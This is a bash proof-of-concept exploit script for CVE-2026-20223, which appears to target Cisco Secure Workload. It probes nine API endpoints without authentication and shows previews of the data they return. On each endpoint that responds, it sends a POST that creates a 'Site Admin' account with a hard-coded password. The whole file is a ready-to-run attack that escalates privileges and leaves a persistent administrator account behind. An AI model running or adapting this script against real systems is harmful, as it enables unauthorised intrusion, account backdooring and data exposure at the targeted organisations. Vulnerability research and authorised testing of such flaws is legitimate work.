#!/bin/bash

# =============================================
# CVE-2026-20223 PoC - Cisco Secure Workload
# Bash Version with Error Handling & Logging
# =============================================

TARGET=""
LOGFILE=""
VERBOSE=false

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
RESET='\033[0m'

log() {
    local level="$1"
    local message="$2"
    local timestamp=$(date '+%Y-%m-%d %H:%M:%S')
    
    case $level in
        INFO)    echo -e "${BLUE}[INFO]${RESET} $message" ;;
        SUCCESS) echo -e "${GREEN}[+]${RESET} $message" ;;
        WARN)    echo -e "${YELLOW}[!]${RESET} $message" ;;
        ERROR)   echo -e "${RED}[ERROR]${RESET} $message" ;;
        CRITICAL) echo -e "${RED}[CRITICAL]${RESET} $message" ;;
        DEBUG)   [[ "$VERBOSE" == true ]] && echo -e "${CYAN}[DEBUG]${RESET} $message" ;;
    esac

    if [[ -n "$LOGFILE" ]]; then
        echo "[$timestamp] [$level] $message" >> "$LOGFILE"
    fi
}

usage() {
    echo "Usage: $0 -t <target_url> [-l <logfile>] [-v]"
    echo "Example: $0 -t https://secure-workload.example.com -l test.log -v"
    exit 1
}

# Parse arguments
while getopts "t:l:v" opt; do
    case $opt in
        t) TARGET="$OPTARG" ;;
        l) LOGFILE="$OPTARG" ;;
        v) VERBOSE=true ;;
        *) usage ;;
    esac
done

if [[ -z "$TARGET" ]]; then
    log ERROR "Target URL is required (-t)"
    usage
fi

# Ensure target has protocol
if [[ ! "$TARGET" =~ ^https?:// ]]; then
    TARGET="https://$TARGET"
fi

TARGET="${TARGET%/}"  # Remove trailing slash

log INFO "Starting CVE-2026-20223 PoC against: $TARGET"
log INFO "Test started at: $(date)"

if [[ -n "$LOGFILE" ]]; then
    log INFO "Logging to file: $LOGFILE"
fi

ENDPOINTS=(
    "/api/v1/users"
    "/api/v1/roles"
    "/api/v1/sites"
    "/api/v1/admin/users"
    "/api/v1/internal/agents"
    "/api/v1/scopes"
    "/api/v1/policies"
    "/api/v1/system/info"
    "/api/v1/config"
)

VULN_COUNT=0

for endpoint in "${ENDPOINTS[@]}"; do
    url="${TARGET}${endpoint}"
    
    log DEBUG "Testing GET $endpoint"
    
    response=$(curl -s -k -w "%{http_code}" -o /tmp/cve_response.txt -H "User-Agent: PoC-CVE-2026-20223" "$url" 2>/dev/null)
    status_code=${response: -3}
    content=$(cat /tmp/cve_response.txt 2>/dev/null)
    
    case $status_code in
        200|201|204)
            log WARN "✅ VULNERABLE: $endpoint → $status_code"
            ((VULN_COUNT++))
            
            if [[ ${#content} -lt 800 ]]; then
                preview=$(echo "$content" | tr '\n' ' ' | cut -c1-250)
                log INFO "    Preview: $preview..."
            fi
            ;;
        401)
            log INFO "🔒 $endpoint requires authentication (likely patched)"
            ;;
        403)
            log INFO "🚫 $endpoint → Forbidden"
            ;;
        000)
            log ERROR "❌ Connection failed to $endpoint"
            ;;
        *)
            log INFO "$endpoint → $status_code"
            ;;
    esac

    # Test POST if GET was successful
    if [[ $status_code -eq 200 || $status_code -eq 201 || $status_code -eq 204 ]]; then
        log DEBUG "Testing POST on $endpoint"
        
        payload='{"username":"poc_cve202620223","password":"PocPass123!@#","role":"Site Admin","email":"poc@testing.local"}'
        
        post_response=$(curl -s -k -w "%{http_code}" -o /tmp/cve_post.txt \
            -H "Content-Type: application/json" \
            -d "$payload" "$url" 2>/dev/null)
        post_status=${post_response: -3}
        
        if [[ $post_status -eq 200 || $post_status -eq 201 ]]; then
            log CRITICAL "🎯 SUCCESS: Created Site Admin via unauthenticated POST on $endpoint!"
        else
            log INFO "POST $endpoint → $post_status"
        fi
    fi
done

rm -f /tmp/cve_response.txt /tmp/cve_post.txt 2>/dev/null

echo ""
if [[ $VULN_COUNT -gt 0 ]]; then
    log CRITICAL "🚨 TARGET IS VULNERABLE! $VULN_COUNT endpoint(s) exposed without authentication."
else
    log SUCCESS "No obvious unauthenticated access detected."
fi

log INFO "Test completed at: $(date)"